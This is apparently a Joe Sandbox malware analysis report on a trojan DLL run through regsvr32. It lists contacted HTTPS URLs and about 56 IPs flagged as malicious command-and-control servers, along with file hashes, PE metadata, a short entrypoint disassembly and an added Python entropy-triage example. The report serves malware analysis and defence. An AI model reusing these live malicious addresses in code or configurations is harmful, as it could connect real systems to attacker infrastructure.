                                                                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLEregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://120.50.40.183/mregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://103.221.221.247:8080/iregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://79.172.212.216:8080/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://185.157.82.211:8080/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
217.182.25.250 | unknown | France | 16276 | OVHFR | true
79.172.212.216 | unknown | Hungary | 61998 | SZERVERPLEXHU | true
151.106.112.196 | unknown | Germany | 61157 | PLUSSERVER-ASN1DE | true
110.232.117.186 | unknown | Australia | 56038 | RACKCORP-APRackCorpAU | true
51.254.140.238 | unknown | France | 16276 | OVHFR | true
173.254.208.91 | unknown | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
206.188.212.92 | unknown | United States | 55002 | DEFENSE-NETUS | true
45.118.115.99 | unknown | Indonesia | 131717 | IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID | true
209.126.98.206 | unknown | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
1.234.21.73 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
149.56.128.192 | unknown | Canada | 16276 | OVHFR | true
176.56.128.118 | unknown | Switzerland | 12637 | SEEWEBWebhostingcolocationandcloudservicesIT | true
45.118.135.203 | unknown | Japan | 63949 | LINODE-APLinodeLLCUS | true
167.99.115.35 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
185.8.212.130 | unknown | Uzbekistan | 48979 | UZINFOCOMUZ | true
197.242.150.244 | unknown | South Africa | 37611 | AfrihostZA | true
51.91.76.89 | unknown | France | 16276 | OVHFR | true
178.79.147.66 | unknown | United Kingdom | 63949 | LINODE-APLinodeLLCUS | true
207.38.84.195 | unknown | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
164.68.99.3 | unknown | Germany | 51167 | CONTABODE | true
189.126.111.200 | unknown | Brazil | 27715 | LocawebServicosdeInternetSABR | true
146.59.226.45 | unknown | Norway | 16276 | OVHFR | true
120.50.40.183 | unknown | Singapore | 17547 | M1NET-SG-APM1NETLTDSG | true
58.227.42.236 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
158.69.222.101 | unknown | Canada | 16276 | OVHFR | true
196.218.30.83 | unknown | Egypt | 8452 | TE-ASTE-ASEG | true
101.50.0.91 | unknown | Indonesia | 55688 | BEON-AS-IDPTBeonIntermediaID | true
195.154.133.20 | unknown | France | 12876 | OnlineSASFR | true
185.157.82.211 | unknown | Poland | 42927 | S-NET-ASPL | true
103.43.46.182 | unknown | Indonesia | 58397 | INFINYS-AS-IDPTInfinysSystemIndonesiaID | true
212.237.17.99 | unknown | Italy | 31034 | ARUBA-ASNIT | true
212.24.98.99 | unknown | Lithuania | 62282 | RACKRAYUABRakrejusLT | true
138.185.72.26 | unknown | Brazil | 264343 | EmpasoftLtdaMeBR | true
103.75.201.2 | unknown | Thailand | 133496 | CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH | true
216.158.226.206 | unknown | United States | 19318 | IS-AS-1US | true
103.75.201.4 | unknown | Thailand | 133496 | CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH | true
51.91.7.5 | unknown | France | 16276 | OVHFR | true
5.9.116.246 | unknown | Germany | 24940 | HETZNER-ASDE | true
188.44.20.25 | unknown | Macedonia | 57374 | GIV-ASMK | true
72.15.201.15 | unknown | United States | 13649 | ASN-VINSUS | true
209.250.246.206 | unknown | European Union | 20473 | AS-CHOOPAUS | true
82.165.152.127 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
107.182.225.142 | unknown | United States | 32780 | HOSTINGSERVICES-INCUS | true
50.116.54.215 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
131.100.24.231 | unknown | Brazil | 61635 | GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR | true
46.55.222.11 | unknown | Bulgaria | 34841 | BALCHIKNETBG | true
173.212.193.249 | unknown | Germany | 51167 | CONTABODE | true
160.16.218.63 | unknown | Japan | 9370 | SAKURA-BSAKURAInternetIncJP | true
192.99.251.50 | unknown | Canada | 16276 | OVHFR | true
45.142.114.231 | unknown | Germany | 44066 | DE-FIRSTCOLOwwwfirst-colonetDE | true
203.114.109.124 | unknown | Thailand | 131293 | TOT-LLI-AS-APTOTPublicCompanyLimitedTH | true
1.234.2.232 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
119.193.124.41 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true
159.8.59.82 | unknown | United States | 36351 | SOFTLAYERUS | true
129.232.188.93 | unknown | South Africa | 37153 | xneeloZA | true
103.221.221.247 | unknown | Viet Nam | 18403 | FPT-AS-APTheCorporationforFinancingPromotingTechnolo | true
                                                                        IP
                                                                        127.0.0.1
                                                                        Joe Sandbox Version:35.0.0 Citrine
                                                                        Analysis ID:669356
Start date and time: 2022-07-20 00:18:10 +02:00
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 11m 34s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:psIFSn7VLi (renamed file extension from none to dll)
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:37
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winDLL@29/8@2/57
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HDC Information:
                                                                        • Successful, ratio: 4.4% (good quality ratio 4.4%)
                                                                        • Quality average: 76.6%
                                                                        • Quality standard deviation: 22.5%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Override analysis time to 240s for rundll32
                                                                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244, 20.101.57.9, 173.222.108.226, 173.222.108.210
                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, twc.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analysed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
00:20:14  API Interceptor  11x Sleep call for process: svchost.exe modified
00:21:06  API Interceptor  1x Sleep call for process: MpCmdRun.exe modified
                                                                        No context
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):8192
                                                                        Entropy (8bit):0.3593198815979092
                                                                        Encrypted:false
                                                                        SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                        MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                        SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                        SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                        SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                        Malicious:false
                                                                        Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:MPEG-4 LOAS
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.2494928717330494
                                                                        Encrypted:false
                                                                        SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4x:BJiRdwfu2SRU4x
                                                                        MD5:3D91D4A83C1B6F065358FA986110242A
                                                                        SHA1:A0AC2BE6995DCF01B89039F1C97168808F456B0F
                                                                        SHA-256:80CB09C3431509834A9E4517255D1BB7D3177C6CFCFEB72FDDC4E038474EB6B7
                                                                        SHA-512:6954EE03DC112F91B73EA143C4D8622A65BBF8873367509972B0F19E4173A486E6356D2710FBD1DD6CDCCB7D0440ACC2375D968DCA2D4E14EB3FDD05EEA38277
                                                                        Malicious:false
                                                                        Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa177ce27, page size 16384, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):786432
                                                                        Entropy (8bit):0.25073483444406297
                                                                        Encrypted:false
                                                                        SSDEEP:384:ADx+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:AD6SB2nSB2RSjlK/+mLesOj1J2
                                                                        MD5:94E45D2F6F749C93765E0DDA0F17BDF2
                                                                        SHA1:0C29628147AAC83078B813FBEF699B9D90A684F9
                                                                        SHA-256:CBC1104D1BEB99BF3A8FF52638D40BC573C51C9E122A1C006ADDE3F5CD2064E4
                                                                        SHA-512:D0C0BAC72ECE21C6F546ACBF5772E6088EE9DE1E71E98748265114227AC72813E3981890291656A8CB03091C7F45799A77BE3E000DD2C61BD26660C2BF1C09CB
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.0772493274986158
                                                                        Encrypted:false
                                                                        SSDEEP:3:l8/J7vr1FfSt9ya3tlrvOMhaP79gotlall3Vkttlmlnl:q/JrpliystxvOMhOSotA3
                                                                        MD5:695C49A2EAB2D0C08CA3DEA4450FFA28
                                                                        SHA1:D85409F6A75D18996E527E8C64F6AE02E590DEF2
                                                                        SHA-256:62DA00B081C60764FFEDC4183FAB22C630BF8993C71C81876454E9CE30FB1985
                                                                        SHA-512:30F1E3FB0CA2D462DD029BDDDAD3EF110CC9AA26EADEA44D66A4A0B4145D68B8A5E317FEA04FAD13B9A51DC1852CE6F02D3A81636F84E864417714C370184DE9
                                                                        Malicious:false
                                                                        Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                        File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                        Category:dropped
                                                                        Size (bytes):61712
                                                                        Entropy (8bit):7.995044632446497
                                                                        Encrypted:true
                                                                        SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                        MD5:589C442FC7A0C70DCA927115A700D41E
                                                                        SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                        SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                        SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                        Malicious:false
                                                                        Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):326
                                                                        Entropy (8bit):3.121306049522698
                                                                        Encrypted:false
                                                                        SSDEEP:6:kKBS+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:ZSNkPlE99SNxAhUeE1
                                                                        MD5:8C805CA8388ED7564AE2D643484357C1
                                                                        SHA1:82992A0F1A252890B517A599B0B66AC44926A921
                                                                        SHA-256:B9D9177E44D666D349EA53968BD511402CF2E2CF487C04242FB12DC151DBE002
                                                                        SHA-512:36722B8C78653E9A76ADFB670436C10359216EB3EF25A75A46E469800AD5BB9BB031697D4B27EE4480A2741C9A999C943EA4937C8612F4F5D72BA56C15FF00A7
                                                                        Malicious:false
Preview (binary header followed by UTF-16LE text, decoded):http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "09f4c9698bd81:0"
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                        Category:modified
                                                                        Size (bytes):10844
                                                                        Entropy (8bit):3.1599156166361886
                                                                        Encrypted:false
                                                                        SSDEEP:192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+EwA+7:j+s+i+Z+z+B+c+Y+0g+J+j+k+7
                                                                        MD5:E9D22BA72359D2558BAD28E242D6255A
                                                                        SHA1:EB5A07FD2FADDF063DAD88BD070C78849723BED0
                                                                        SHA-256:B3B00BE08644293309D5276071EAD74262B01EFE51AFAFE036767614544F80C6
                                                                        SHA-512:87A348647E7DDE354D081873479A7C00C3794CE6D72B11F553D9D5DEE32AADEB2497D0C9392006A00BA0D82980DEE0F25B0012B15DA5305BB318A29202691859
                                                                        Malicious:false
Preview (UTF-16LE text, decoded):
------------------------------------------------------------
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
 Start Time: Thu Jun 27 2019 01:29:49

MpEnsureProcessMitigationPolicy: hr = 0x1
WDEnable
ERROR: MpWDEnable(TRUE) failed (800704EC)
MpCmdRun: End Time: Thu Jun 27 2019 01:29:49
------------------------------------------------------------
                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.120700808121365
                                                                        TrID:
                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                        • Windows Screen Saver (13104/52) 1.29%
                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:psIFSn7VLi.dll
                                                                        File size:901120
                                                                        MD5:46c0c3d61c9d7de7b0d8e183217a6cc8
                                                                        SHA1:ce31a65c73c0728e65d5385731d483f7e9f871c2
                                                                        SHA256:4533c9dc1c440bf97882358911acf6d3e25ff6b402ca442d752886904f72b786
                                                                        SHA512:93ab246702d4b34dc090ac63056d25158ad54ba49c446ae55c95b57e63b8280882557f9d014308ce17837bd2fbf37f6568d0c5fee7f07b3355ed1f274d24d2c3
                                                                        SSDEEP:12288:+t1xV1OkAShtOKAgHOSEvkHR0V0akoDZw/5:m1xV1EShtOKPEg0Kkm
                                                                        TLSH:7915D3836895A4E0D59B1B3B211D5FA730C7841D47C246EF2AF81B9C79E9AD4807CECE
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6R..r3..r3..r3...;..u3......t3..a;..p3...;..}3..r3...2..w?..n3..w?...3..Y...{3..w?..93..w?..s3...8..s3..w?..s3..Richr3.........
                                                                        Icon Hash:71b018ccc6577131
                                                                        Entrypoint:0x1003f780
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x10000000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x623AA02C [Wed Mar 23 04:21:00 2022 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:70b8cfa68ef2c7898ee65b9a0ce218ac
                                                                        Instruction
                                                                        push 0000000Ch
                                                                        push 10089A08h
                                                                        call 00007FA6305512D5h
                                                                        xor eax, eax
                                                                        inc eax
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                        xor edi, edi
                                                                        cmp esi, edi
                                                                        jne 00007FA63054FDEEh
                                                                        cmp dword ptr [1009A394h], edi
                                                                        je 00007FA63054FE99h
                                                                        mov dword ptr [ebp-04h], edi
                                                                        cmp esi, eax
                                                                        je 00007FA63054FDE7h
                                                                        cmp esi, 02h
                                                                        jne 00007FA63054FE13h
                                                                        mov eax, dword ptr [1009C0D0h]
                                                                        cmp eax, edi
                                                                        je 00007FA63054FDEEh
                                                                        push dword ptr [ebp+10h]
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call eax
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        cmp dword ptr [ebp-1Ch], edi
                                                                        je 00007FA63054FE6Bh
                                                                        push dword ptr [ebp+10h]
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call 00007FA63054FC07h
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        cmp eax, edi
                                                                        je 00007FA63054FE54h
                                                                        mov ebx, dword ptr [ebp+10h]
                                                                        push ebx
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call 00007FA6305117E3h
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        cmp esi, 01h
                                                                        jne 00007FA63054FDF0h
                                                                        cmp eax, edi
                                                                        jne 00007FA63054FDECh
                                                                        push ebx
                                                                        push edi
                                                                        push dword ptr [ebp+08h]
                                                                        call 00007FA63054FBDDh
                                                                        cmp esi, edi
                                                                        je 00007FA63054FDE7h
                                                                        cmp esi, 03h
                                                                        jne 00007FA63054FE0Bh
                                                                        push ebx
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call 00007FA63054FBCAh
                                                                        test eax, eax
                                                                        jne 00007FA63054FDE5h
                                                                        mov dword ptr [ebp-1Ch], edi
                                                                        cmp dword ptr [ebp-1Ch], edi
                                                                        je 00007FA63054FDF5h
                                                                        mov eax, dword ptr [1009C0D0h]
                                                                        cmp eax, edi
                                                                        je 00007FA63054FDECh
                                                                        push ebx
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        call eax
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        or dword ptr [ebp-04h], FFFFFFFFh
                                                                        mov eax, dword ptr [ebp-1Ch]
                                                                        jmp 00007FA63054FDFCh
                                                                        mov eax, dword ptr [ebp-14h]
                                                                        mov ecx, dword ptr [eax]
                                                                        Programming Language:
                                                                        • [ASM] VS2003 (.NET) build 3077
                                                                        • [ C ] VS2003 (.NET) build 3077
                                                                        • [C++] VS2003 (.NET) build 3077
                                                                        • [EXP] VS2003 (.NET) build 3077
                                                                        • [RES] VS2003 (.NET) build 3077
                                                                        • [LNK] VS2003 (.NET) build 3077
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x94850 | 0x185 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9d000 | 0xf0 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa2000 | 0x2be66 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xce000 | 0xf4a8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x8e140 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x9dba0 | 0xab0 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xa1000 | 0x40 | .didat
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x84ae8 | 0x85000 | False | 0.27153210173872183 | data | 5.302056329599929 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x86000 | 0xe9d5 | 0xf000 | False | 0.25263671875 | data | 4.44585720018697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x95000 | 0x70d4 | 0x4000 | False | 0.16986083984375 | data | 2.4289792449983194 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x9d000 | 0x37ce | 0x4000 | False | 0.29052734375 | data | 4.568283042984266 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0xa1000 | 0x319 | 0x1000 | False | 0.0322265625 | data | 0.299592467810197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xa2000 | 0x2be66 | 0x2c000 | False | 0.7665516246448864 | data | 6.957504814219069 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xce000 | 0x1139b | 0x12000 | False | 0.5456136067708334 | data | 6.347143619787505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
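The Entropy and ZLIB Complexity columns are what make the section table useful for triage: a code section that compiles to around 5-6 bits per byte is normal, while a section near 7 or above is usually compressed or encrypted content. The following is an added example (not part of the Joe Sandbox report) showing how both numbers are computed and how a threshold is applied to the rows above; the 6.5 cut-off is an assumed triage heuristic, and treating "ZLIB Complexity" as compressed size divided by raw size is an assumption about the report's definition.

```python
import math
import zlib
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for
    uniformly distributed bytes. Native x86 code typically lands between
    5 and 6.5; compressed or encrypted payloads push towards 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def zlib_ratio(data: bytes) -> float:
    """Deflate-compressed size divided by raw size (assumed to be what the
    report's 'ZLIB Complexity' measures): near 0 for padding, near 1 for data
    that deflate cannot shrink any further."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


# Rows transcribed (rounded) from the section table above:
# (name, raw size, zlib complexity, entropy)
REPORT_SECTIONS = [
    (".text", 0x85000, 0.2715, 5.302),
    (".rdata", 0xf000, 0.2526, 4.446),
    (".data", 0x4000, 0.1699, 2.429),
    (".idata", 0x4000, 0.2905, 4.568),
    (".didat", 0x1000, 0.0322, 0.300),
    (".rsrc", 0x2c000, 0.7666, 6.958),
    (".reloc", 0x12000, 0.5456, 6.347),
]


def suspicious_sections(rows, entropy_threshold=6.5, min_raw_size=0x1000):
    """Names of sections that are both large enough to hold a payload and
    above the (assumed) entropy cut-off; these are the ones to carve first."""
    return [name for name, raw, _ratio, entropy in rows
            if raw >= min_raw_size and entropy >= entropy_threshold]


if __name__ == "__main__":
    # Constructed buffers standing in for section contents.
    print("zeros   ", shannon_entropy(b"\x00" * 4096), zlib_ratio(b"\x00" * 4096))
    print("uniform ", shannon_entropy(bytes(range(256)) * 16), zlib_ratio(bytes(range(256)) * 16))
    print("flagged ", suspicious_sections(REPORT_SECTIONS))
```

On this sample the only section over the cut-off is .rsrc, which is consistent with the large unnamed resource listed in the resource table below; what that blob actually is has to be established by carving and inspecting it, not inferred from entropy alone.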
Name | RVA | Size | Type | Language | Country
(unnamed) | 0xa3330 | 0x20800 | data | English | Australia
RT_CURSOR | 0xc3b30 | 0x134 | data | English | Australia
RT_CURSOR | 0xc3c80 | 0x134 | data | English | United States
RT_CURSOR | 0xc3db8 | 0xb4 | data | English | United States
RT_CURSOR | 0xc3e98 | 0x134 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0xc3fe8 | 0x134 | data | English | United States
RT_CURSOR | 0xc4138 | 0x134 | data | English | United States
RT_CURSOR | 0xc4288 | 0x134 | data | English | United States
RT_CURSOR | 0xc43d8 | 0x134 | data | English | United States
RT_CURSOR | 0xc4528 | 0x134 | data | English | United States
RT_CURSOR | 0xc4678 | 0x134 | data | English | United States
RT_CURSOR | 0xc47c8 | 0x134 | data | English | United States
RT_CURSOR | 0xc4918 | 0x134 | data | English | United States
